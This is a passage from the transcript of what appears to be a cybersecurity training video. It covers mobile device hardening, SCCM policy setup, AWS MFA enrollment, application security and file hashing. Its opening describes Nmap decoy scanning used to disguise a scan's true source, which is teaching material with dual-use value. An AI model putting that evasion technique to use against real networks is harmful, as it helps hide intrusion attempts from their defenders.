192.168.0.252 Host is up (0.073s latency). PORT 80/tcp STATE closed SERVICE
http MAC Address: 00:00:CA:01:02:03 (Arris Group). [Video description ends]
And by the way, if you're wondering what all the command line parameters are that
are available, you can do that. You can view it by looking at the man page, the help
page.
[Video description begins] He executes the command: clear. The prompt does not
change. [Video description ends]
So man space nmap and then from here, I can go through the help system, navigate
through it, to get a description about how it works.
[Video description begins] He executes the command: man nmap. The Nmap
reference guide is displayed as output. [Video description ends]
And then eventually as we go further down, we'll start seeing all of the command
line parameters. And remember, that upper and lower case letters have a different
meaning.
[Video description begins] The Wi-Fi window is open. It is divided into six parts.
The first part is the menu bar. The second part is the toolbar. The third part
includes the Apply a display filter ... <Ctrl-/> search box. The fourth part contains
a table with the column headers: No., Time, Source, Destination, Protocol, Length,
and Info. The No. column header includes the values: 7110 and 7111. The Time
column header includes the values: 11.634610 and 11.634723. The Source column
header includes the value: 192.168.0.20. The Destination column header includes
the values: 1.1.1.1 and 1.1.1.3. The Protocol column header includes the value:
TCP. The Length column header includes the value: 54. The Info column header
includes the value: 80 -> 41701 [RST, ACK] Seq=1 Ack=1 Win=0 Len=0. The fifth
part includes the statement: Transmision Control Protocol, Src Port: 80, Dst Port:
41701, Seq: 1, Ack: 1, Len: 0. The sixth part includes 0000 2c 99 24 5a 17 c0 18 56
80 c3 68 ba 08 00 45 00 ,.$Z...V ..h...E. [Video description ends]
While the scan was running, I was capturing network traffic on the same host from
which the scan was being run. And notice that we've got some listings here related
to 1.1.1.1, 1.1.1.3. And there are plenty other ones throughout the packet captured
that was part of our decoy that we wanted to make sure we passed along through
with our Nmap scan.
[Video description begins] He scrolls through the table entries. [Video description
ends]
So that it looks like the scan came from a number of different hosts and not just our
specific IP address.
Mobile Device Access Control
[Video description begins] Topic title: Mobile Device Access Control. The
presenter is Dan Lachance. [Video description ends]
Most organizations these days allow their employees to use mobile devices for
increased productivity.
[Video description begins] Mobile Device Access Control [Video description ends]
That is not to say there is no risk in engaging in this activity. There is risk because
we've got an entry point for malware potentially, especially if people are using
smartphones also for personal use. So we have to consider the mobile devices and
the apps they're using, whether they're custom built by the organization or whether
they are standard off-the-shelf apps. And we can determine which ones should be
allowed to be used by users.
We then have to determine whether mobile devices are using things like certificate
authentication. That could be applicable for VPN access when people are not at the
office and want to use their smartphone to access sensitive systems owned by the
organization or sensitive data that results from the use of those systems. Mobile
device management, otherwise called MDM, allows us to centrally control the
security settings and to manage things like applications on mobile devices on a
large scale. So we can have a centralized device inventory so that we know which
devices are out there.
How many iOS devices, how many Android devices, and also, which apps are
installed on them, and how up to date they are with virus signatures and so on. So
we have centralized management as well as centralized reporting available as a
result of this. Now that is not to mention that we've got centralized configuration to
control all of these items as well. Organizations might allow users to bring their
own device.
[Video description begins] Mobile Device Usage [Video description ends]
bring your own device, otherwise called BYOD, allows users to use their personal
smartphone for business use. Certainly, there is risk involved with this. But another
potential option is corporate owned personally enabled devices, otherwise called
COPE. This means that the company purchases and owns the device and allows
users to use it of course for business use as well as personal use. But the difference
is that the company gets to control things like the device type. They can all be the
same which allows for easier consistent device management.
Also, the organization can determine how hard they are right from the beginning
because the company has access to the device first. But what is the challenge with
this? Well, the challenge with using either bring your own device or corporate
owned personally enabled devices, which is very popular these days, is to make
sure we somehow keep personal and organizational apps and data and settings
separate from one another on the single device. And often with mobile device
management solutions, this is referred to as mobile device dual persona. Because
it's being used for personal use, and it's being used for business use. So what can
we do to harden mobile devices, ideally, centrally from our mobile device
management solution.
[Video description begins] Mobile Device Hardening [Video description ends]
Well, we can enable strong authentication, whether it's strong passwords or multifactor authentication, MFA, perhaps where the user is sent a code through SMS text
messaging as they try to log in with a username and a password, or maybe their
device needs a PKI certificate. We should also consider enabling remote wipe. So
that if a device is lost or stolen, the IT team has the ability to wipe it so that any
sensitive data will not be available to whoever stole the device, for example. We
can also enable device tracking, whether it's through Internet connectivity or by cell
towers, and so on. This way, we can determine where the device is, if it's been lost
or stolen or to track employee locations.
Of course, this is possible with satellite technology through GPS, the Global
Positioning System, as well. Geofencing is another interesting option, where
essentially we can control which apps are available, or how they behave, or even
how security settings are applied, depending on the physical location of the user
device. So maybe a sensitive application can only be used when the user is at work
with their device. Once they leave the building, the device is no longer available.
And certainly on a personal level, we might have run into this. If we've gone
shopping somewhere, and all of a sudden we get a welcome text message in an app
from the mall, the shopping center. Or maybe we get certain coupons are available,
we're in a certain location, and so on. That is all referred to as geofencing.
Other device hardening options include making sure that the mobile device has a
firewall installed. Not just at the network perimeter but every single computing
device should have a personal firewall configured appropriately as well as
antimalware scanning configured. We can also enable encryption on mobile
devices for data at rest, whether it's on the device itself or removable micro SD
card. We can also enable encryption for data in transit for that mobile device
through IPsec, which allows us to encrypt all network communications regardless
of the application being used. We could even use a VPN that the user could
authenticate to when they're working away from the office to give them a secure
tunnel over the Internet to resources available in the office. We can also disable a
number of settings.
Part of hardening anything is disabling things that are not needed in order to reduce
the attack surface. Things like disabling Bluetooth if we don't need it, disabling
connectivity to public Wi-Fi hotspots, preventing users or removing the ability for
them to install apps or perhaps limiting which apps they can install. Enabling GPS
tracking is sometimes good for remote tracking, but in another sense we also might
want to disable it. Such as for members of the military or law enforcement that
might use organizationally supplied smartphone devices. Also, we might disable
the camera or microphone for privacy reasons.
Finally, we can also enable data loss prevention, or DLP, to the installation of a
software agent on the mobile device that is controlled by a central management
solution. Data loss prevention means we want to prevent or minimize any sensitive
data from being leaked outside of the organization. So a software agent gets
installed on the device and centralized policies that we get to configure will
determine how sensitive data is treated. So for example, we might make sure that
users of a smartphone have the inability to send e-mail attachments that contain
sensitive data to external e-mail addresses outside of the organization.
Configure Mobile Device Hardening Policies
[Video description begins] Topic title: Configure Mobile Device Hardening
Policies. The presenter is Dan Lachance. [Video description ends]
In this demonstration, I'll configure centralized mobile device hardening policies.
There are plenty of tools out there that let you do this, like MobileIron or Microsoft
System Center Configuration Manager, along with Microsoft Intune. So in this
case, we'll be using Microsoft System Center Configuration Manager. So here in
my Server 2016 installation, I've already installed SCCM, System Center
Configuration Manager. So I'm going to go ahead and fire up the System Center
Config Manager console.
[Video description begins] The System Center Configuration Manager window is
divided into four parts. The first part is the menu bar. The second part is the
address bar. The third part is divided into two sections. The first section is the
Administration pane. It contains the Overview root node, which includes the Cloud
Services subnode. The second section includes the Assets and Compliance and
Monitoring options. The fourth part is the content pane. It displays the
Administration page. It has two expandable sections. The first section is the
Navigation Index, and the second section is the Recent Alerts (0) - Last updated:
1/8/2019 10:24:37 AM. [Video description ends]
The next thing I need to do is to go into the Assets and Compliance workspace.
[Video description begins] He clicks the Assets and Compliance option. The Assets
and Compliance pane opens in the first section of the third part and the
Compliance Settings page opens in the content pane. The Assets and Compliance
pane contains the Overview root node. This node includes the Compliance Settings
subnode. [Video description ends]
So I've clicked on that in the bottom-left and then in the left hand navigator, I'll
expand Compliance Settings.
[Video description begins] The Compliance Settings subnode includes the
Configuration Items and Configuration Baselines options. [Video description ends]
I need to create what is called a configuration item that contains my mobile device
hardening settings.
[Video description begins] He clicks the Configuration Items option. The content
pane includes a table. This table has the column headers: Icon, Name, Type,
Device Type, Revision, Child, Relationships, User Setting, and Date
Modified. [Video description ends]
Then I need to add it to a configuration baseline and deploy that to a collection of
devices.
[Video description begins] He clicks the Configuration Baselines option. The
content pane includes a table and the Summary and Deployments tabs. The table
has the column headers: Icon, Name, Status, Deployed, User Setting, Date
Modified, Compliance Count, Noncompliance Count, Failure Count, and Modified
By. [Video description ends]
Then we'll be hardening our mobile environment. So I'm going to start by rightclicking on Configuration Items and choosing Create Configuration Item.
[Video description begins] He right-clicks the Configuration Items option and
selects the Create Configuration Item option. The Create Configuration Item
Wizard opens. It displays the General page. This page includes the Name text box,
Android and Samsung KNOX radio button, and the Next button. [Video description
ends]
I'm going to call this Harden Lollipop, because we're going to apply this to the
Android version 5 operating system which is called Lollipop. Android always has
great, yummy, sweet names for its operating system versions, like Marshmallow,
and in this case Lollipop.
[Video description begins] He types Harden Lollipop in the Name text box. [Video
description ends]
So down below, I'm going to choose Android and Samsung KNOX and then I'll
click Next.
[Video description begins] He selects the Android and Samsung KNOX radio
button. [Video description ends]
Then I can expand the Android operating system, and I can determine the specific
versions.
[Video description begins] The Supported Platforms page is displayed. It contains
the Android node. [Video description ends]
So maybe I want to exclude version 4, this is only for Android 5, and then Next.
[Video description begins] The Android node contains the Android KNOX
Standard 4.0 and higher, Android 4, and Android 5 checkboxes. These are
selected. [Video description ends]
Then I can determine the types of settings I'm interested in.
[Video description begins] He clears the Android KNOX Standard 4.0 and higher
and Android 4 checkboxes. [Video description ends]
Well, Compliant and Noncompliant Apps (Android), that is a big one.
[Video description begins] The Device Settings page is displayed. It includes the
Select all, Security, Encryption, and Compliant and Noncompliant Apps (Android)
checkboxes. [Video description ends]
Because a lot of security breaches could potentially stem from people running or
installing and running apps that are not allowed to be run on the machine.
[Video description begins] He selects the Compliant and Noncompliant Apps
(Android) checkbox. [Video description ends]
They might contain malware, they could reduce the security of the device. So I'm
actually going to turn on the check mark for Encryption, Security, and Password as
well, and then I'll click Next.
[Video description begins] The Password page is displayed. It includes the Require
password settings on devices drop-down list box, Minimum password length
(characters) and Password expiration in days checkboxes, and the Idle time before
device is locked drop-down list box. Each of the checkboxes has a spin box
attached to them. The Minimum password length (characters) and Password
expiration in days checkboxes and the Idle time before device is locked drop-down
list box are disabled. [Video description ends]
First thing, we've got passwords settings. So I'm going to go ahead and choose
Required.
[Video description begins] He selects the Required option in the Require password
settings on devices drop-down list box. The Minimum password length (characters)
and Password expiration in days checkboxes and the Idle time before device is
locked drop-down list box get enable. [Video description ends]
And maybe I would set an option such as the fact that the minimum password
length needs to be at least 8 characters, and maybe password expiration in days,
maybe a 7.
[Video description begins] He selects the Minimum password length (characters)
checkbox and sets the value of the spin box, adjacent to it, to 8. [Video description
ends]
This would all be done in accordance with organizational security policies.
[Video description begins] He selects the Password expiration in days checkbox
and sets the value of the spin box, adjacent to it, to 7. [Video description ends]
There should be no guesswork here when I'm configuring it at this level. Maybe the
idle time before the device is locked, 5 minutes. So you get the idea, we can
configure these types of items.
[Video description begins] He selects the 5 minutes option in the Idle time before
device is locked drop-down list box. [Video description ends]
I'll go ahead and click Next. Then I can determine for example, in this case whether
the camera is Allowed or Prohibited.
[Video description begins] The Security page is displayed. It includes the Camera
drop-down list box. [Video description ends]
Maybe Prohibited if it's only work use and we have no need of the camera for work
purposes. I'll click Next.
[Video description begins] He selects the Prohibited option in the Camera dropdown list box. [Video description ends]
And maybe file encryption on the device, I'll apply that as being turned on.
[Video description begins] The Encryption page is displayed. It includes the File
encryption on device drop-down list box. [Video description ends]
Finally, my Compliant and Noncompliant Apps (Android).
[Video description begins] He selects the On option in the File encryption on
device drop-down list box. [Video description ends]
Well I can click, may have to add let's say the Google Authenticator App is going
to be an important part of an Android device being compliant with these security
settings.
[Video description begins] He clicks the Next button. The Android App Compliance
page is displayed. It includes the Add button and the Noncompliant apps list: Use
this list to specify the Android apps that will be reported as noncompliant and the
Compliant apps list: Use this list to specify the Android apps that users are allowed
to install. Any other apps will be reported as noncompliant radio buttons. The
Noncompliant apps list: Use this list to specify the Android apps that will be
reported as noncompliant radio button is selected by default. [Video description
ends]
So I have to put in the App URL.
[Video description begins] He clicks the Add button. The Add App to the
Noncompliant List dialog box opens. It contains the Name, Publisher, and App
URL text boxes and the Add and Cancel buttons. [Video description ends]
Well, all I have to do for that is go to the Google Play Store.
[Video description begins] He types Google Authenticator in the Name text
box. [Video description ends]
I've already searched up the Google Authenticator, so I can just go ahead and copy
the URL from the URL box in my browser. And then I can simply paste that into
the App URL. So I'll go ahead and add that one, of course we could add more.
[Video description begins] He clicks the Add button, and the Add App to the
Noncompliant List dialog box closes. [Video description ends]
And I can determine whether I want to look at this from a noncompliant or a
compliant perspective.
[Video description begins] He hovers over the Noncompliant apps list: Use this list
to specify the Android apps that will be reported as noncompliant and the
Compliant apps list: Use this list to specify the Android apps that users are allowed
to install. Any other apps will be reported as noncompliant radio buttons. [Video
description ends]
So if it's noncompliant, it means use this list to specify the apps that will be
reported as noncompliant. Well, I want this to be compliant.
[Video description begins] He selects the Compliant apps list: Use this list to
specify the Android apps that users are allowed to install. Any other apps will be
reported as noncompliant radio button. [Video description ends]
So if they've got the Google Authenticator, that is good for additional
authentication factors for security, then I'll click Next.
[Video description begins] The Platform Applicability page is displayed. [Video
description ends]
And I'm not going to add any exclusions, click Next, and Next again.
[Video description begins] The Summary page is displayed. [Video description
ends]
And finally after a moment, we will have created our configuration item
[Video description begins] The Progress page is displayed. [Video description
ends]
so that we can start to harden our mobile device environment.
[Video description begins] The Completion page is displayed. [Video description
ends]
Close out of that and let's just go back to the config manager console.
[Video description begins] He clicks the Close button, and the Create
Configuration Item Wizard closes. [Video description ends]
And there it is, harden the Lolipop operating system. We see the config item.
[Video description begins] The Icon column displays the icon. The Name column
header has the value, Harden Lollipop. The Type column header has the value,
General. The Device Type column header has the value, Mobile. The Revision
column header has the value, 1. The Child column header has the value, No. The
Relationships column header has the value, No. The User Setting column header
has the value, No. The Date Modified column header has the value, 1/8/2019 10:28
AM. [Video description ends]
So I'm going to go ahead here and go under Configuration Baselines and I'm going
to build a new one as you add config items to it.
[Video description begins] He right-clicks the Configuration Baselines option and
selects the Create Configuration Baseline option. The Create Configuration
Baseline dialog box opens. It includes the Name text box, the Add drop-down
button, and the OK button. [Video description ends]
I'm going to call this Harden Android Baseline.
[Video description begins] He types Harden Android Baseline in the Name text
box. [Video description ends]
And then down below, I'm going to click Add > Configuration Items and I'll choose
the Harden Lollipop item we just created and I'll add that. Click OK and OK.
[Video description begins] He clicks the Add drop-down button and selects the
Configuration Items option. The Add Configuration Items dialog box opens. It is
divided into two parts. The first parts is Available configuration items. The second
section is Configuration items that will be added to this configuration baseline.
Available configuration items includes a table and the Add button. The table has
five column headers: Name, Type, Latest Revision, Description, and Status. The
Name column header includes the value, Harden Lollipop. The Type column
header includes the value, General. The Latest Revision column header includes
the value, 1. The Description column header has no value. The Status column
header includes the value, Enabled. Configuration items that will be added to this
configuration baseline includes a table and the OK button. The table has five
column headers: Name, Type, Latest Revision, Description, and Status. These
columns do not have any value. [Video description ends]
So now, we've got the configuration item added to our baseline.
[Video description begins] He selects the Harden Lollipop value in the Name
column header and clicks the Add button. The Name, Type, Latest Revision, and
Status columns headers of the table in Configuration items that will be added to
this configuration baseline get populated with the values, Harden Lollipop,
General, Revision 1, and Enabled, respectively. He then clicks the OK button to
close the Add Configuration Items dialog box. [Video description ends]
Next thing to do is to right-click on the baseline and to deploy it to a collection of
mobile devices.
[Video description begins] He clicks the OK button to close the Create
Configuration Baseline dialog box. [Video description ends]
A collection is just a group of devices.
[Video description begins] The Icon column displays the icon. The Name column
header includes the value, Harden Android Baseline. The Status column header
includes the value, Enabled. The Deployed column header includes the value, No.
The User Setting column header includes the value, No. The Date Modified column
header includes the value, 1/8/2019 10:28 AM. The Compliance Count column
header includes the value, 0. The Noncompliance Count column header includes
the value, 0. The Failure Count column header includes the value, 0. The Modified
By column header includes the value, FAKEDOMAIN. [Video description ends]
And here in config manager, I can specify the collection that I want to deploy this
configuration baseline to.
[Video description begins] He right-clicks the Harden Android Baseline value in
the Name column header and selects the Deploy option. The Deploy Configuration
Baselines dialog box opens. It includes the Collection text box, the Remediate
noncompliant rules when supported checkbox, and the Run every spin box. A
Browse button is present adjacent to the Collection text box. The Allow remediation
outside the maintenance window checkbox is present below the Remediate
noncompliant rules when supported checkbox. It is disabled. [Video description
ends]
So I'll go ahead and click Browse. And here, I'm going to go into Device
Collections.
[Video description begins] The Select Collection dialog box opens. It is divided into
three parts. The first part contains a drop-down list box and the Root folder. The
second part contains the Filter search box and a table with the column headers:
Name and Member Count. The Name column header includes the value, All Users.
The Member Count column header includes the value, 2. The third part includes
the OK button. [Video description ends]
I might have a specific collection for mobile devices. There is a built-in one here
called All Mobile Devices.
[Video description begins] He clicks the drop-down list box in the first part and
selects the Device Collections option. The Name column header includes the value,
All Mobile Devices. The Member Count column header includes the value,
0. [Video description ends]
I don't have any mobile devices being managed by a CCM here yet. But if you did,
you would see a numeric value here other than 0 under the Member Count for the
All Mobile Devices collection, click OK. Also, I'm going to choose to remediate
noncompliance when it's found.
[Video description begins] The Select Collection dialog box closes. [Video
description ends]
So if the camera is enabled for example, then I'm going to choose to remediate that
by disabling the camera.
[Video description begins] He selects the Remediate noncompliant rules when
supported checkbox. The Allow remediation outside the maintenance window
checkbox gets enabled. [Video description ends]
I'm going to run this compliance against these mobile devices everyday.
[Video description begins] He sets the value of the Run every spin box to 1. [Video
description ends]
And then I'm going to click OK. And now if I select our Android baseline
hardening item, I can go down to Deployments here at the bottom.
[Video description begins] The Deploy Configuration Baselines dialog box
closes. [Video description ends]
And I can see that it's been deployed to the All Mobile Devices collection.
[Video description begins] The Deployments tab includes a table with the column
headers: Icon, Collection, Compliance %, Deployment Start Time, and Action. The
Icon column header displays the icon image. The Collection column header has the
value, All Mobile Devices. The Compliance % column header has the value, 0.0.
The Deployment Start Time column header has the value, 1/8/2019 10:29 AM. The
Action column header has the value, Remediate. [Video description ends]
Enable a Smartphone as a Virtual MFA Device
[Video description begins] Topic title: Enable a Smartphone as a Virtual MFA
Device. The presenter is Dan Lachance. [Video description ends]
These days, multi-factor authentication is all the rage when it comes to securing
user accounts, especially using an out of band mechanism to communicated codes
such as to a smartphone with an app installed. So in this example, I'm going to
enable a smartphone as a virtual MFA or multi-factor authentication device for use
with Amazon Web Services.
[Video description begins] The AWS Management Console web page is open. It is
divided into four parts. The first part includes the Services drop-down button. The
second part is AWS services. It contains the Find services search box and the
Recently visited services and All services expandable sections. The All services
expandable section is expanded. It includes the Compute and Machine Learning
sections. The Compute section includes the EC2 and ECR options. The Machine
Learning section includes the Amazon SageMaker and AWS DeepLens options. The
second part is Access resources on the go. The third part is Explore AWS. [Video
description ends]
To start with, you need an account with Amazon Web Services or AWS. I've
already got one, and I've signed in to the administrative console. The next thing I'm
going to do here, in the AWS Management Console, is I'm going to take a look at
any existing users I might have created in the past. Now, I've already got a user
here that has been added to a group. So we're going to go to take a look at it
because we're going to enable MFA, or multi-factor authentication, for that user. So
let's get to it. Let's scroll down, under Security, Identity & Compliance, I'm going
to click IAM, which stands for Identity and Access Management.
[Video description begins] The IAM Management Console web page is displayed.
It is divided into three parts. The first part is the navigation pane. It includes the
Users option. The second part is the content pane. The third part is Feature
Spotlight. [Video description ends]
And over on the left, I'm going to click Users.
[Video description begins] The content pane includes a table and the Add User and
Delete User buttons. The table has the column headers: User name, Groups,
Access key page, Password age, Last activity, and MFA . The User name column
header has the value, jchavez. The Groups column header has the value,
LasVegas_HelpDesk. The Access key age column header has the value, None. The
Password age column header has the value, 34 days. The Last activity column
header has the value, 34 days. The MFA column header has the value, Not
enabled. [Video description ends]
And here we have a user called jchavez, that is a member of the
LasVegas_HelpDesk group, which gives them certain permissions to manage AWS
cloud resources. But our purpose here is I'm going to click on the username because
we want to enable MFA.
[Video description begins] He clicks the jchavez value in the User name column
header. The Summary page opens. It includes the Permissions and Security
credentials tabs. [Video description ends]
And in the user information, I want to go to the Security credentials tab. We can
see the assigned MFA device says Not assigned.
[Video description begins] The Security credentials tab includes the Sign-in
credentials section. It includes the text, Assigned MFA device Not assigned |
Manage. Manage is a link. [Video description ends]
So I'm going to go ahead and click Manage.
[Video description begins] The Manage MFA device dialog box opens. It includes
the Virtual MFA device radio button and the Continue button. The Virtual MFA
device radio button is selected. [Video description ends]
Now, we could use a physical security key or hardware token, physically some kind
of device. But here, we're going to enable a virtual MFA device, which means I've
got an authenticator app installed on my smartphone. And if I don't, I'd have to go
the appropriate app store to install it. So I'm going to go ahead and choose
Continue.
[Video description begins] He clicks the Continue button. The Set up virtual MFA
device dialog box opens. It includes the text, 1. Install a compatible app on your
mobile device or computer See a list of compatible applications 2. Use your virtual
MFA app and your device's camera to scan the QR code, 3. Type two consecutive
MFA codes below, and Previous and Assign MFA buttons. list of compatible
applications in the text, See a list of compatible application, is a link. A box
displaying a link, Show QR code, is present below the text, Use your virtual MFA
app and your device's camera to scan the QR code. The MFA code 1 and MFA
code 2 text boxes are given below the text, 3. Type two consecutive MFA codes
below. The Assign MFA button is disabled. [Video description ends]
Now at this point, it tells me to install the compatible app on my mobile device or
computer. And if I go to the list of compatible apps, it'll tell me what is supported.
[Video description begins] He clicks the list of compatible applications link. The
Multi-Factor Authentication web page opens. [Video description ends]
So if I go down, I can see for my virtual MFA device, I can determine which item I
can install on a particular type of platform. So for example, for Android, which I've
got, I can install the Google Authenticator. Anyways, that is fine.
[Video description begins] He closes the Multi-Factor Authentication web
page. [Video description ends]
But the next thing we have to do is use the virtual MFA app on the device's
machine or on the device to scan the QR code that will show up here. I'm going to
click here that QR code.
[Video description begins] He clicks the Show QR code link. The QR code is
displayed in the box. [Video description ends]
So I'm going to pause for a moment here. I'm going to install the Google
Authenticator on my Android and I'm going to scan this QR code. Once you've
scanned the QR code with your authenticator app, in my case Google
Authenticator, that is what I've chosen. The next thing to do is to put in the code
that it's going to be displaying. So the app on your smartphone will be generating a
code that changes periodically. So you have a certain window of time to enter that
in before you'll be able to authenticate.
[Video description begins] He types 119558 in the MFA code 1 text box. [Video
description ends]
So for example, I'll pop in the code that is being displayed on my device, and then
I'll wait for the next code to show up. It wants two codes before we can complete
this procedure.
[Video description begins] He types 293978 in the MFA code 2 text box. The
Assign MFA button gets enabled. [Video description ends]
And then after that, I can click Assign MFA.
[Video description begins] The Set up virtual MFA device message box opens. It
displays the message, You have successfully assigned virtual MFA This virtual
MFA will be required during sign-in. It also displays the Close button. [Video
description ends]
And it now tells me that I have successfully assigned the virtual MFA for this
account.
[Video description begins] He clicks the Close button, and the message box closes.
The Summary page includes the text, User ARN
arn:aws:iam::611279832722:user/jchavez. The Security credentials tab includes
the text, Summary Console sign-in link: https://611279832722.
signin.aws.amazon.com/console. [Video description ends]
And it says that this virtual MFA, multi-factor authentication, will be required
during sign-in, in this case, for this particular user, which is jchavez, as we can see
listed all the way up here.
[Video description begins] He highlights
arn:aws:iam::611279832722:user/jchavez in the text, User ARN
arn:aws:iam::611279832722:user/jchavez. [Video description ends]
Notice here in Amazon Web Services while we're under the Security credentials
tab, that we've got the console sign-in link for this particular user. Why don't we
fire that up and try to log in as that user and see what happens?
[Video description begins] He opens the Amazon Web Services Sign-In web page. It
includes the Account ID or alias, IAM user name, and Password text boxes and the
Sign In button. The Account ID or alias text box has the value, 611279832722. The
IAM user name and Password text boxes are blank. [Video description ends]
So when I'm pop in that URL, it knows the Account ID. So I have to enter the IAM
user name for Amazon Web Services along with the password, I still need to know
that. But then when I click Sign In, it should require me to enter something else.
[Video description begins] He types jchavez in the IAM user name text box and
password in the Password text box. [Video description ends]
Because that is multi-factor authentication and that something else would only be
available if I have my smartphone where I've configured that authentication. So it's
waiting for me to enter the MFA Code.
[Video description begins] He clicks the Sign In button. The MFA Code text box,
the Submit button, and the Cancel link appear. [Video description ends]
So all I would do on my smartphone is fire up, in my case, my Google
Authenticator app. And for a certain period of time, a code will be displayed before
it changes to something else. So I'm going to go ahead and enter in the code that is
displayed currently to see if I can authenticate.
[Video description begins] He types 351264 in the MFA Code text box and clicks
the Submit button. The error, Your authentication information is incorrect. Please
try again, appears above the Account ID or alias, IAM user name, and Password
text boxes and the Sign In button. [Video description ends]
Sometimes if you're not quick enough with the code, it might expire before it'll let
you in. So let's go ahead and try this again.
[Video description begins] He types password in the Password text box and clicks
the Sign In button. The MFA Code text box, the Submit button, and the Cancel link
appear. [Video description ends]
I just you have to wait for the code to update, it's just about expired on my
smartphone app. Okay, let's try this again.
[Video description begins] He types 139381 in the MFA Code text box and clicks
the Submit button. He gets logged in to AWS Management Console. The user name,
jchavez @ 6112-7983-2722, is present in the web page. He hovers over this user
name. [Video description ends]
This time I am successfully authenticated as user jchavez with multi-factor
authentication.
Securing Applications
[Video description begins] Topic title: Securing Applications. The presenter is Dan
Lachance. [Video description ends]
Securing applications is an important aspect of cybersecurity. Whether we're
talking about applications people use personally or, of course, those also used for
business productivity.
[Video description begins] Securing Applications [Video description ends]
The first consideration within an organization is whether off-the-shelf applications
are being used, straight from an app store, for example, in a mobile device
environment. In which case, we want to make sure that digital signatures are
trusted. Most apps in common app stores are digitally signed by the organizations
that build them. And this digital signature can't be easily forged, and so it
establishes a chain of trust. We trust that the author of this application has built an
application that is trustworthy. We've got a digital signature. At the same time we
can also have an organizational list of only approved apps that can be installed
from specific app stores.
In some cases, organizations can even build their own custom organizational app
stores and make apps available for business productivity that they control in that
specific app store. Organizations can also commission the creation, or they can
build their own custom built applications. We also have to consider where apps are
being used in the sense of geofencing. If we've got a sensitive app that really should
only be used within the perimeter of a facility, or a campus, well then, we can
configure geofencing so that the app only works within that location. Securing
applications also means dealing with access control. In other words, dealing with
an identity store where user accounts would exist. Or in some cases we also have
devices that authenticate to an application even without user intervention.
Or software can communicate with other pieces of software automatically, again,
with no user intervention. But either way, it's access control, it's a unique identity,
and we need to make sure that strong authentication is being used beyond just
username and password type of authentication. Access control also deals with
granting a specific level of permission to a resource for an entity such as a user or a
group. And so we want to make sure that adhere to the principle of least privilege,
where we're only applying the permissions that are required to perform a task, and
nothing more. We should also consider whether we want to audit failed access
attempts. There is this notion also of application wrapping, whereby we can add
user authentication to a specific application.
You might have one app that is highly sensitive that requires further additional
authentication beyond what the user might already use, to sign into their laptop or
their desktop or their phone. And so application wrapping lets us add additional
authentication to an app, even if the app doesn't support it internally, so we can add
that additional level of security. Logging is always an important of security and
certainly that is the case when it comes to tracking application activity. We should
always make sure that, first of all logging is enabled for app usage.
And that we store additional copies of logs on a centralized logging host on a
protected network. And that can even be automated when it comes to configuring
devices to forward specific log events elsewhere. Securing an application also
means changing default settings. Such as where the app installed itself in terms of
the file system hierarchy. Changing any account names or passwords specifically
associated with the app. So we never stick with defaults when it comes to
hardening an environment, that also applies to securing applications. If your
organization is building a custom application, then the development team will
adhere to the software development life cycle.
[Video description begins] Software Development Life Cycle [Video description
ends]
Of course, if you use off-the-shelf software, commercial software, those
programming teams also adhered to this model. Where we have a number of
different phases such as the requirements phase, what do we need these software to
do. Then, we can analyze whether there is already a solution out there or whether
we're going to do a custom built solution. Then we start designing the solution,
followed by actual coding by programmers.
Which is then followed by testing, make sure that the code is secure, and that the
application is functional and meets requirements. Finally, we can then deploy the
solution. Now, why are we talking about this? We're talking about securing
applications, and the point here is that through each and every of these SDLC
phases, security must be thought of. We don't want to get to the point where we are
testing and then realize we should think about security. Or get to the point where
we're actually writing code, and then start thinking about security. Security needs to
be a part of every software development life cycle phase. For web applications, we
can use a web application firewall, otherwise called a WAF, W-A-F.
[Video description begins] Securing Applications [Video description ends]
The purpose of the web application firewall is to check for web application types of
attacks, such as directory traversal attacks. Or SQL injection attacks. Cross-site
scripting attacks and many, many more. So it's a specialized application level
firewall for web-based applications. Another option is to consider using load
balancing or a reverse proxying solution. Where a client requests for an application
would hit a public interface, for instance, of a load balancer. Which in turn would
determine which of the back end servers are actually hosting the app are the least
busy, and forward the request to it. So if this way we're hiding true server identities
for our application servers.
Encryption is always a good idea when it comes to securing applications. The
network level, we can think of using HTTPS. Now, HTTPS means that we've got
access to a web application through a URL, and that the server needs a PKI
certificate. And ideally, the server will be configured to use not SSL, not even a
SSL version three, but rather TLS. And this way, we have a secure way of
exchanging keys and information during that encrypted session. We can also use
virtual private networks or VPNs to allow people to work remotely. They establish
an encrypted tunnel with an endpoint, for example, a VPN concentrator on the
premises or the company location, and everything between the user device and that
VPN concentrator is encrypted. Also we might use IPsec. IPsec allows us to control
very specifically which type of IP traffic is encrypted, even all of it.
And this happens regardless of application, it's not like we have to configure a PKI
certificate for a specific web app on a server like we would with HTTPS. So IPsec
is much more broad in its potential application or usage. Of course, it's always
important to secure data at rest with encryption, such as in the file system,
encrypting files or folders, or disk volumes. Encrypting databases or replicas of
databases that we might have out there. The OWASP top 10 is very important when
it comes to securing applications. You might be wondering why? Why is it so
important? OWASP stands for the Open Web Application Security Project. And if
you've never heard of this or taking it into account in the past, it deals with different
types of web application security vulnerabilities.
That are then open to attacks like injection attacks or authentication that might be
broken in an app, or security misconfigurations. And every year there is an
OWASP top 10, in terms of top 10 vulnerabilities, that gets published. So OWASP
is really focused on web app security, and also provides tools for securing and
testing web applications. So OWASP is a very important when it comes to having a
discussion about securing specifically web applications. Developers can also use
the OWASP ESAPI. Now what this is is the Enterprise Security API, which allows
developers to use secure coding functions that are already built and trusted.
Implement File Hashing
[Video description begins] Topic title: Implement File Hashing. The presenter is
Dan Lachance. [Video description ends]
In this demonstration, I'll implement file hashing using Microsoft Windows
PowerShell. File hashing allows us to generate a unique value based on the
contents of a file. And we can compare that in the future when we run file hashing
again to see if those two unique hashes or values are the same.
Because if they're not, something has changed in the file. And so this is used often
by forensic investigators that gather IT digital evidence to ensure that data hasn't
been tampered with. And it adheres to the chain of custody.
[Video description begins] The Windows Powershell window is open. It displays
the prompt, PS D:\work\Projects_Sample_Files>. [Video description ends]
So the first thing I'm going to do here on my machine is point out that I've
navigated to drive D, where I've got some folders with some sample files. If I do a
dir, we've got three project files, they're just text files.
[Video description begins] He executes the command: dir. The output displays a
table with four column headers: Mode, LastWriteTime, Length, and Name. The
Mode column header has the value, -a----, for all the rows. The LastWriteTime
column header has the value, 11/08/16 12:32 PM, for all the rows. The Length
column header has the values, 456, 912, and 26112. The Name column header has
the values, Project_A.txt, Project_B.txt, and Project_C.txt. The prompt does not
change. [Video description ends]
What I'm going to do is use the get-filehash PowerShell commandlet. And I'm
going to specify *, because I want to get a filehash or generate a hash for each and
every file within this current subdirectory. When I press Enter, we can see the file
hashes that are applied to each of the files.
[Video description begins] He executes the command: get-filehash *. The output
